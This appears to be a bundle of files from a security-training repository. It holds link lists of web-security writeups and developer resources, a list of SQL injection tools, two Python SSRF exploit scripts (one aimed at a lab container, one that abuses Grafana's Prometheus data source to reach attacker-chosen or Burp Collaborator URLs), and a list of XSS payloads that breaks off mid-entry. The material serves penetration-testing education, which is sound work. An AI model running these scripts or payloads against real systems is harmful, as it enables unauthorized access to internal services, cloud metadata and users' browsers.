[GraphQL NoSQL Injection Through JSON Types](https://medium.com/@east5th/graphql-nosql-injection-through-json-types-a1a0a310c759) - Written by [@east5th](https://medium.com/@east5th). ### FTP Injection - [XML Out-Of-Band Data Retrieval](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf) - Written by [@a66at](https://twitter.com/a66at) and Alexey Osipov. - [XXE OOB exploitation at Java 1.7+](http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html) - Written by [Ivan Novikov](http://lab.onsec.ru/). ### XXE - [Evil XML with two encodings](https://mohemiv.com/all/evil-xml/) - Written by [Arseniy Sharoglazov](https://mohemiv.com/). ### SSRF - [PHP SSRF Techniques](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) - Written by [@themiddleblue](https://medium.com/@themiddleblue). - [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) - Written by [aesteral](https://hackerone.com/aesteral). - [A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf) - Written by [Orange](http://blog.orange.tw/). - [SSRF Tips](http://blog.safebuff.com/2016/07/03/SSRF-Tips/) - Written by [xl7dev](http://blog.safebuff.com/). ### Header Injection - [Java/Python FTP Injections Allow for Firewall Bypass](http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html) - Written by [Timothy Morgan](https://plus.google.com/105917618099766831589). ### URL - [Some Problems Of URLs](https://noncombatant.org/2017/11/07/problems-of-urls/) - Written by [Chris Palmer](https://noncombatant.org/about/). - [Phishing with Unicode Domains](https://www.xudongz.com/blog/2017/idn-phishing/) - Written by [Xudong Zheng](https://www.xudongz.com/). - [Unicode Domains are bad and you should feel bad for supporting them](https://www.vgrsec.com/post20170219.html) - Written by [VRGSEC](https://www.vgrsec.com/). - [[dev.twitter.com] XSS](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) - Written by [Sergey Bobrov](http://blog.blackfan.ru/). # AMAZING RESOURCES ABOUT WEB TECHNOLOGIES, FRAMEWORKS, PLATFORMS (hundreds of resources) ## Platforms - [Node.js](https://github.com/sindresorhus/awesome-nodejs) - JavaScript runtime built on Chrome's V8 JavaScript engine. - [Frontend Development](https://github.com/dypsilon/frontend-dev-bookmarks) - [iOS](https://github.com/vsouza/awesome-ios) - Mobile operating system for Apple phones and tablets. - [Android](https://github.com/JStumpp/awesome-android) - [IoT & Hybrid Apps](https://github.com/weblancaster/awesome-IoT-hybrid) - [Electron](https://github.com/sindresorhus/awesome-electron) - Cross-platform native desktop apps using JavaScript/HTML/CSS. - [Cordova](https://github.com/busterc/awesome-cordova) - JavaScript API for hybrid apps. - [React Native](https://github.com/jondot/awesome-react-native) - [Xamarin](https://github.com/benoitjadinon/awesome-xamarin) - Mobile app development IDE, testing, and distribution. - [Linux](https://github.com/aleksandar-todorovic/awesome-linux) - [Containers](https://github.com/Friz-zy/awesome-linux-containers) - [macOS](https://github.com/iCHAIT/awesome-macOS) - [Command-Line](https://github.com/herrbischoff/awesome-osx-command-line) - [Screensavers](https://github.com/aharris88/awesome-macos-screensavers) - [watchOS](https://github.com/yenchenlin/awesome-watchos) - Operating system for the Apple Watch. - [JVM](https://github.com/deephacks/awesome-jvm) - [Salesforce](https://github.com/mailtoharshit/awesome-salesforce) - [Amazon Web Services](https://github.com/donnemartin/awesome-aws) - [Windows](https://github.com/Awesome-Windows/Awesome) - [IPFS](https://github.com/ipfs/awesome-ipfs) - P2P hypermedia protocol. - [Fuse](https://github.com/vinkla/awesome-fuse) - Mobile development tools. - [Heroku](https://github.com/ianstormtaylor/awesome-heroku) - Cloud platform as a service. - [Raspberry Pi](https://github.com/thibmaek/awesome-raspberry-pi) - Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. - [Qt](https://github.com/JesseTG/awesome-qt) - Cross-platform GUI app framework. - [WebExtensions](https://github.com/bfred-it/Awesome-WebExtensions) - Cross-browser extension system. - [RubyMotion](https://github.com/motion-open-source/awesome-rubymotion) - Write cross-platform native apps for iOS, Android, macOS, tvOS, and watchOS in Ruby. - [Smart TV](https://github.com/vitalets/awesome-smart-tv) - Create apps for different TV platforms. - [GNOME](https://github.com/Kazhnuz/awesome-gnome) - Simple and distraction-free desktop environment for Linux. ## Programming Languages - [JavaScript](https://github.com/sorrycc/awesome-javascript) - [Promises](https://github.com/wbinnssmith/awesome-promises) - [Standard Style](https://github.com/standard/awesome-standard) - Style guide and linter. - [Must Watch Talks](https://github.com/bolshchikov/js-must-watch) - [Tips](https://github.com/loverajoel/jstips) - [Network Layer](https://github.com/Kikobeats/awesome-network-js) - [Micro npm Packages](https://github.com/parro-it/awesome-micro-npm-packages) - [Mad Science npm Packages](https://github.com/feross/awesome-mad-science) - Impossible sounding projects that exist. - [Maintenance Modules](https://github.com/maxogden/maintenance-modules) - For npm packages. - [npm](https://github.com/sindresorhus/awesome-npm) - Package manager. - [AVA](https://github.com/avajs/awesome-ava) - Test runner. - [ESLint](https://github.com/dustinspecker/awesome-eslint) - Linter. - [Functional Programming](https://github.com/stoeffel/awesome-fp-js) - [Observables](https://github.com/sindresorhus/awesome-observables) - [npm scripts](https://github.com/RyanZim/awesome-npm-scripts) - Task runner. - [Swift](https://github.com/matteocrippa/awesome-swift) - [Education](https://github.com/hsavit1/Awesome-Swift-Education) - [Playgrounds](https://github.com/uraimo/Awesome-Swift-Playgrounds) - [Python](https://github.com/vinta/awesome-python) - [Asyncio](https://github.com/timofurrer/awesome-asyncio) - Asynchronous I/O in Python 3. - [Scientific Audio](https://github.com/faroit/awesome-python-scientific-audio) - Scientific research in audio/music. - [Rust](https://github.com/rust-unofficial/awesome-rust) - [Haskell](https://github.com/krispo/awesome-haskell) - [PureScript](https://github.com/passy/awesome-purescript) - [Go](https://github.com/avelino/awesome-go) - [Scala](https://github.com/lauris/awesome-scala) - [Ruby](https://github.com/markets/awesome-ruby) - [Events](https://github.com/planetruby/awesome-events) - [Clojure](https://github.com/razum2um/awesome-clojure) - [ClojureScript](https://github.com/hantuzun/awesome-clojurescript) - [Elixir](https://github.com/h4cc/awesome-elixir) - [Elm](https://github.com/isRuslan/awesome-elm) - [Erlang](https://github.com/drobakowski/awesome-erlang) - [Julia](https://github.com/svaksha/Julia.jl) - [Lua](https://github.com/LewisJEllis/awesome-lua) - [C](https://github.com/aleksandar-todorovic/awesome-c) - [C/C++](https://github.com/fffaraz/awesome-cpp) - [R](https://github.com/qinwf/awesome-R) - [D](https://github.com/zhaopuming/awesome-d) - [Common Lisp](https://github.com/CodyReichert/awesome-cl) - [Perl](https://github.com/hachiojipm/awesome-perl) - [Groovy](https://github.com/kdabir/awesome-groovy) - [Dart](https://github.com/yissachar/awesome-dart) - [Java](https://github.com/akullpp/awesome-java) - [RxJava](https://github.com/eleventigers/awesome-rxjava) - [Kotlin](https://github.com/KotlinBy/awesome-kotlin) - [OCaml](https://github.com/rizo/awesome-ocaml) - [ColdFusion](https://github.com/seancoyne/awesome-coldfusion) - [.NET](https://github.com/quozd/awesome-dotnet) - [Core](https://github.com/thangchung/awesome-dotnet-core) - [PHP](https://github.com/ziadoz/awesome-php) - [Composer](https://github.com/jakoch/awesome-composer) - Package manager. - [Delphi](https://github.com/Fr0sT-Brutal/awesome-delphi) - [Assembler](https://github.com/jaspergould/awesome-asm) - [AutoHotkey](https://github.com/ahkscript/awesome-AutoHotkey) - [AutoIt](https://github.com/J2TeaM/awesome-AutoIt) - [Crystal](https://github.com/veelenga/awesome-crystal) - [Frege](https://github.com/sfischer13/awesome-frege) - Haskell for the JVM. - [CMake](https://github.com/onqtam/awesome-cmake) - Build, test, and package software. - [ActionScript 3](https://github.com/robinrodricks/awesome-actionscript3) - Object-oriented language targeting Adobe AIR. - [Eta](https://github.com/sfischer13/awesome-eta) - Functional programming language for the JVM. - [Idris](https://github.com/joaomilho/awesome-idris) - General purpose pure functional programming language with dependent types influenced by Haskell and ML. ## Front-End Development - [ES6 Tools](https://github.com/addyosmani/es6-tools) - [Web Performance Optimization](https://github.com/davidsonfellipe/awesome-wpo) - [Web Tools](https://github.com/lvwzhen/tools) - [CSS](https://github.com/sotayamashita/awesome-css) - [Critical-Path Tools](https://github.com/addyosmani/critical-path-css-tools) - [Scalability](https://github.com/davidtheclark/scalable-css-reading-list) - [Must-Watch Talks](https://github.com/AllThingsSmitty/must-watch-css) - [Protips](https://github.com/AllThingsSmitty/css-protips) - [React](https://github.com/enaqx/awesome-react) - App framework. - [Relay](https://github.com/expede/awesome-relay) - Framework for building data-driven React apps. - [Web Components](https://github.com/mateusortiz/webcomponents-the-right-way) - [Polymer](https://github.com/Granze/awesome-polymer) - JavaScript library to develop Web Components. - [Angular](https://github.com/gdi2290/awesome-angular) - App framework. - [Backbone](https://github.com/sadcitizen/awesome-backbone) - App framework. - [HTML5](https://github.com/diegocard/awesome-html5) - Markup language used for websites & web apps. - [SVG](https://github.com/willianjusten/awesome-svg) - XML-based vector image format. - [Canvas](https://github.com/raphamorim/awesome-canvas) - [KnockoutJS](https://github.com/dnbard/awesome-knockout) - [Dojo Toolkit](https://github.com/petk/awesome-dojo) - [Inspiration](https://github.com/NoahBuscher/Inspire) - [Ember](https://github.com/nmec/awesome-ember) - App framework. - [Android UI](https://github.com/wasabeef/awesome-android-ui) - [iOS UI](https://github.com/cjwirth/awesome-ios-ui) - [Meteor](https://github.com/Urigo/awesome-meteor) - [BEM](https://github.com/sturobson/BEM-resources) - [Flexbox](https://github.com/afonsopacifer/awesome-flexbox) - [Web Typography](https://github.com/deanhume/typography) - [Web Accessibility](https://github.com/brunopulis/awesome-a11y) - [Material Design](https://github.com/sachin1092/awesome-material) - [D3](https://github.com/wbkd/awesome-d3) - Library for producing dynamic, interactive data visualizations. - [Emails](https://github.com/jonathandion/awesome-emails) - [jQuery](https://github.com/petk/awesome-jquery) - Easy to use JavaScript library for DOM manipulation. - [Tips](https://github.com/AllThingsSmitty/jquery-tips-everyone-should-know) - [Web Audio](https://github.com/notthetup/awesome-webaudio) - [Offline-First](https://github.com/pazguille/offline-first) - [Static Website Services](https://github.com/aharris88/awesome-static-website-services) - [A-Frame VR](https://github.com/aframevr/awesome-aframe) - Virtual reality for web browsers. - [Cycle.js](https://github.com/cyclejs-community/awesome-cyclejs) - Functional and reactive JavaScript framework. - [Text Editing](https://github.com/dok/awesome-text-editing) - [Motion UI Design](https://github.com/fliptheweb/motion-ui-design) - [Vue.js](https://github.com/vuejs/awesome-vue) - App framework. - [Marionette.js](https://github.com/sadcitizen/awesome-marionette) - App framework. - [Aurelia](https://github.com/behzad888/awesome-aurelia) - App framework. - [Charting](https://github.com/zingchart/awesome-charting) - [Ionic Framework 2](https://github.com/candelibas/awesome-ionic) - [Chrome DevTools](https://github.com/ChromeDevTools/awesome-chrome-devtools) - [PostCSS](https://github.com/jjaderg/awesome-postcss) - CSS tool. - [Draft.js](https://github.com/nikgraf/awesome-draft-js) - Rich text editor framework for React. - [Service Workers](https://github.com/TalAter/awesome-service-workers) - [Progressive Web Apps](https://github.com/TalAter/awesome-progressive-web-apps) - [choo](https://github.com/YerkoPalma/awesome-choo) - App framework. - [Redux](https://github.com/brillout/awesome-redux) - State container for JavaScript apps. - [webpack](https://github.com/webpack-contrib/awesome-webpack) - Module bundler. - [Browserify](https://github.com/ungoldman/awesome-browserify) - Module bundler. - [Sass](https://github.com/Famolus/awesome-sass) - CSS preprocessor. - [Ant Design](https://github.com/websemantics/awesome-ant-design) - Enterprise-class UI design language. - [Less](https://github.com/LucasBassetti/awesome-less) - CSS preprocessor. - [WebGL](https://github.com/sjfricke/awesome-webgl) - JavaScript API for rendering 3D graphics. - [Preact](https://github.com/ooade/awesome-preact) - App framework. - [Progressive Enhancement](https://github.com/jbmoelker/progressive-enhancement-resources) - [Next.js](https://github.com/unicodeveloper/awesome-nextjs) - Framework for server-rendered React apps. - [Hyperapp](https://github.com/hyperapp/awesome-hyperapp) - Tiny JavaScript library for building web apps. ## Back-End Development - [Django](https://github.com/rosarior/awesome-django) - [Flask](https://github.com/humiaozuzu/awesome-flask) - [Docker](https://github.com/veggiemonk/awesome-docker) - [Vagrant](https://github.com/iJackUA/awesome-vagrant) - [Pyramid](https://github.com/uralbash/awesome-pyramid) - [Play1 Framework](https://github.com/PerfectCarl/awesome-play1) - [CakePHP](https://github.com/friendsofcake/awesome-cakephp) - PHP framework. - [Symfony](https://github.com/sitepoint/awesome-symfony) - [Education](https://github.com/pehapkari/awesome-symfony-education) - [Laravel](https://github.com/chiraggude/awesome-laravel) - PHP framework. - [Education](https://github.com/fukuball/Awesome-Laravel-Education/blob/master/langs/en_US.md) - [Rails](https://github.com/ekremkaraca/awesome-rails) - Web app framework for Ruby. - [Gems](https://github.com/hothero/awesome-rails-gem) - Packages. - [Phalcon](https://github.com/phalcon/awesome-phalcon) - [Useful `.htaccess` Snippets](https://github.com/phanan/htaccess) - [nginx](https://github.com/fcambus/nginx-resources) - Web server. - [Dropwizard](https://github.com/stve/awesome-dropwizard) - [Kubernetes](https://github.com/ramitsurana/awesome-kubernetes) - [Lumen](https://github.com/unicodeveloper/awesome-lumen) - [Serverless Framework](https://github.com/JustServerless/awesome-serverless) - [Apache Wicket](https://github.com/PhantomYdn/awesome-wicket) - Java web app framework. - [Vert.x](https://github.com/vert-x3/vertx-awesome) - Toolkit for building reactive apps on the JVM. - [Terraform](https://github.com/shuaibiyy/awesome-terraform) - Tool for building, changing, and versioning infrastructure. ## Databases - [Database](https://github.com/numetriclabz/awesome-db) - [MySQL](https://github.com/shlomi-noach/awesome-mysql/blob/gh-pages/index.md) - [SQLAlchemy](https://github.com/dahlia/awesome-sqlalchemy) - [InfluxDB](https://github.com/mark-rushakoff/awesome-influxdb) - [Neo4j](https://github.com/neueda/awesome-neo4j) - [MongoDB](https://github.com/ramnes/awesome-mongodb) - NoSQL database. - [RethinkDB](https://github.com/d3viant0ne/awesome-rethinkdb) - [TinkerPop](https://github.com/mohataher/awesome-tinkerpop) - Graph computing framework. - [PostgreSQL](https://github.com/dhamaniasad/awesome-postgres) - Object-relational database. - [CouchDB](https://github.com/quangv/awesome-couchdb) - Document-oriented NoSQL database. - [HBase](https://github.com/rayokota/awesome-hbase) - Distributed, scalable, big data store. ## Content Management Systems - [Umbraco](https://github.com/leekelleher/awesome-umbraco) - [Refinery CMS](https://github.com/refinerycms-contrib/awesome-refinerycms) - Ruby on Rails CMS. - [Wagtail](https://github.com/springload/awesome-wagtail) - Django CMS focused on flexibility and user experience. - [Textpattern](https://github.com/drmonkeyninja/awesome-textpattern) - Lightweight PHP-based CMS. - [Drupal](https://github.com/nirgn975/awesome-drupal) - Extensible PHP-based CMS. - [Craft CMS](https://github.com/chasegiunta/awesome-craft) - Content-first CMS.
Markdown
h4cker/web_application_testing/sql-injection-tools.md
# Popular SQL Injection Tools - [SQLmap](https://github.com/sqlmapproject/sqlmap) - [jSQL Injection](https://github.com/ron190/jsql-injection) - [BBQSQL](https://github.com/CiscoCXSecurity/bbqsql) - [NoSQLMap](https://github.com/codingo/NoSQLMap) - [DSSS](https://github.com/stamparm/DSSS) - [explo](https://github.com/telekom-security/explo) - [Blind SQL Injection via Bitshifting](https://github.com/awnumar/blind-sql-bitshifting) - [Blisqy](https://github.com/JohnTroony/Blisqy)
Python
h4cker/web_application_testing/ssrf_galatic_archives.py
''' Script to exploit the SSRF in the WebSploit Labs Galatic Archives container. Author: Omar Santos @santosomar ''' import requests # The URL of the vulnerable web service. vulnerable_url = 'http://10.6.6.20:5000' # The internal URL that the attacker wants to access. # This is to simulate that this data (secret.txt) should be inaccessible from attacker's network. internal_url = 'https://internal.secretcorp.org/secret.txt' # The attacker constructs the exploit URL by appending the internal URL # as a query parameter to the vulnerable service's URL. exploit_url = vulnerable_url + '?url=' + internal_url # The attacker sends a request to the exploit URL. response = requests.get(exploit_url) # If the vulnerable server is running inside an AWS EC2 instance, it # will return the instance metadata. print(response.text)
Markdown
h4cker/web_application_testing/ssrf_ywing.md
# SSRF Test Script [This script](https://github.com/The-Art-of-Hacking/h4cker/blob/master/web_application_testing/ssrf_ywing.py) is a utility to test for potential Server Side Request Forgery (SSRF) vulnerabilities in a Grafana instance through Prometheus. ## Author This script was originally authored by @RandomRobbieBF; then slightly modified by Omar Santos to add additional documentation and instructions. ## Pre-requisites - Python 3 - Python `requests` library ## Usage This script requires command line arguments to run. Here's a list of all arguments: - `-s` or `--session`: The session cookie value. (Default: `"9765ac114207245baf67dfd2a5e29f3a"`) - `-u` or `--url`: The URL of the host to check for SSRF. (Default: `"http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net"` or you can use interact.sh) - `-H` or `--host`: The Grafana host URL. (Required) - `-U` or `--username`: The Grafana username. (Optional) - `-P` or `--password`: The Grafana password. (Optional) - `-p` or `--proxy`: A proxy for debugging. (Optional) To run the script, navigate to the script's directory and use the following command: ``` python ssrf_ywing.py -H "http://victim_host" -u cf3jbjp2vtc0000ey330g8t3f3cyyyyyb.oast.fun ``` Replace `cf3jbjp2vtc0000ey330g8t3f3cyyyyyb.oast.fun` with the URL of interact.sh or Burp Collaborator. ## Note - This script operates under the assumption that the target host permits insecure SSL connections. This assumption is premised on the fact that the containers in WebSploit Labs are configured to run over HTTP, reflecting their sole purpose of serving as controlled environments for testing and learning. - The SSRF exploit attempted by this script does not follow redirects.
Python
h4cker/web_application_testing/ssrf_ywing.py
#!/usr/bin/env python # This script is used to test a Grafana instance for Server Side Request Forgery (SSRF) vulnerabilities through Prometheus. # This was originally authored by @RandomRobbieBF. # Note: The SSRF exploit attempted by this script does not follow redirects. # Importing the required libraries import requests import json import sys import argparse import re import os.path import json from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disabling warnings from insecure requests for cleaner output. requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Creating a new session object that will persist across requests session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-s", "--session", required=False ,default="9765ac114207245baf67dfd2a5e29f3a",help="Session Cookie Value") parser.add_argument("-u", "--url", required=False, default="http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net",help="URL of host to check will need http or https") parser.add_argument("-H", "--host", default="http://kubernetes.docker.internal:5000",required=True, help="Host for Grafana") parser.add_argument("-f", "--file", default="urls.txt",required=False, help="File of URLS to check SSRF Against") parser.add_argument("-U", "--username", default="",required=False, help="Username for Grafana") parser.add_argument("-P", "--password", default="",required=False, help="Password for Grafana") parser.add_argument("-p", "--proxy", default="",required=False, help="Proxy for debugging") args = parser.parse_args() ssrf_url = args.url sessionid = args.session ghost = args.host files = args.file username = args.username password = args.password if args.proxy: http_proxy = args.proxy os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy def create_source(sessionid,ssrf_url,ghost): rawBody = "{\"name\":\"SSRF-TESTING\",\"type\":\"prometheus\",\"access\":\"proxy\",\"isDefault\":false}" headers = {"Origin":""+ghost+"","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Referer":""+ghost+"/datasources/new","Connection":"close","x-grafana-org-id":"1","content-type":"application/json","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"} cookies = {"grafana_session":""+sessionid+""} response = session.post(""+ghost+"/api/datasources", data=rawBody, headers=headers, cookies=cookies,verify=False) y = json.loads(response.text) if "Data source with same name already exists" in response.text: print("You will need to manually delete the current source that is named SSRF-TESTING") sys.exit(0) elif "id" in response.text: print("Source Created") return (y["id"]) else: print ("Error:") print("Status code: %i" % response.status_code) print(response.text) def refresh_source(ghost,sessionid,id): headers = {"Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Referer":""+ghost+"/datasources/edit/6/","Connection":"close","x-grafana-org-id":"1","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"} cookies = {"grafana_session":""+sessionid+""} response = session.get(""+ghost+"/api/datasources/"+id+"", headers=headers, cookies=cookies,verify=False) if response.status_code == 200: print("Refreshed Sources") else: print("Error:") print("Status code: %i" % response.status_code) print(response.text) delete_source(sessionid,id,ghost) def create_ssrf(sessionid,ssrf_url,ghost,id): rawBody = "{\"id\":"+id+",\"orgId\":1,\"name\":\"SSRF-TESTING\",\"type\":\"prometheus\",\"typeLogoUrl\":\"\",\"access\":\"proxy\",\"url\":\""+ssrf_url+"\",\"password\":\"test\",\"user\":\"test\",\"database\":\"test\",\"basicAuth\":false,\"basicAuthUser\":\"\",\"basicAuthPassword\":\"\",\"withCredentials\":false,\"isDefault\":false,\"jsonData\":{\"tlsSkipVerify\":true,\"httpHeaderName1\":\"Metadata-Flavor\",\"httpHeaderName2\":\"Metadata\",\"httpMethod\":\"GET\"},\"secureJsonData\":{\"httpHeaderValue1\":\"Google\",\"httpHeaderValue2\":\"true\"},\"version\":1,\"readOnly\":false}" headers = {"Origin":""+ghost+"","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Referer":""+ghost+"/datasources/edit/6/","Connection":"close","x-grafana-org-id":"1","content-type":"application/json","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"} cookies = {"grafana_session":""+sessionid+""} response = session.put(""+ghost+"/api/datasources/"+id+"", data=rawBody, headers=headers, cookies=cookies,verify=False) if response.status_code == 200: print("SSRF Source Updated") else: print("Error:") print("Status code: %i" % response.status_code) print(response.text) delete_source(sessionid,id,ghost) def check_ssrf(sessionid,id,ghost,ssrf_url): headers = {"Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Referer":""+ghost+"/datasources/edit/"+id+"/","Connection":"close","x-grafana-org-id":"1","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","x-grafana-nocache":"true"} cookies = {"grafana_session":""+sessionid+""} response = session.get(""+ghost+"/api/datasources/proxy/"+id+"/", headers=headers, cookies=cookies,verify=False) if response.status_code != 502: print("Status code: %i" % response.status_code) print("Response body:\n %s" % response.text) gghost = ghost.partition('://')[2] sub_addr = gghost.partition('.')[0] text_file = open(""+sub_addr+".txt", "a") text_file.write("SSRF URL: %s\n" % ssrf_url) text_file.write("Status code: %i\n" % response.status_code) text_file.write("Response body: %s\n\n\n\n" % response.text) text_file.close() delete_source(sessionid,id,ghost) else: print("Error:") print(response.text) delete_source(sessionid,id,ghost) def delete_source(sessionid,id,ghost): headers = {"Origin":""+ghost+"","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Referer":""+ghost+"/datasources/edit/3/","Connection":"close","x-grafana-org-id":"1","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"} cookies = {"grafana_session":""+sessionid+""} response = session.delete(""+ghost+"/api/datasources/"+id+"", headers=headers, cookies=cookies,verify=False) if "Data source deleted" in response.text: print("Deleted Old SSRF Source") else: print("Error:") print(response.text) sys.exit(0) def login(ghost,username,password): rawBody = "{\"user\":\""+username+"\",\"password\":\""+password+"\",\"email\":\"\"}" headers = {"Origin":""+ghost+"","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Referer":""+ghost+"/signup","Connection":"close","content-type":"application/json","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"} cookies = {"redirect_to":"%2F"} response = session.post(""+ghost+"/login", data=rawBody, headers=headers, cookies=cookies,verify=False) if "grafana_session" in response.cookies: return response.cookies["grafana_session"] if "grafana_sess" in response.cookies: return response.cookies["grafana_sess"] else: print("Login Session Cookie not set") sys.exit(0) if username: sessionid = login(ghost,username,password) if ssrf_url: i = create_source (sessionid,ssrf_url,ghost) id = str(i) refresh_source(ghost,sessionid,id) create_ssrf(sessionid,ssrf_url,ghost,id) check_ssrf(sessionid,id,ghost,ssrf_url) if files: if os.path.exists(files): with open(files, 'r') as f: for line in f: ssrf_url = line.replace("\n","") i = create_source (sessionid,ssrf_url,ghost) id = str(i) refresh_source(ghost,sessionid,id) create_ssrf(sessionid,ssrf_url,ghost,id) check_ssrf(sessionid,id,ghost,ssrf_url) f.close()
Markdown
h4cker/web_application_testing/xss_vectors.md
# A collection of XSS vectors ``` <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg 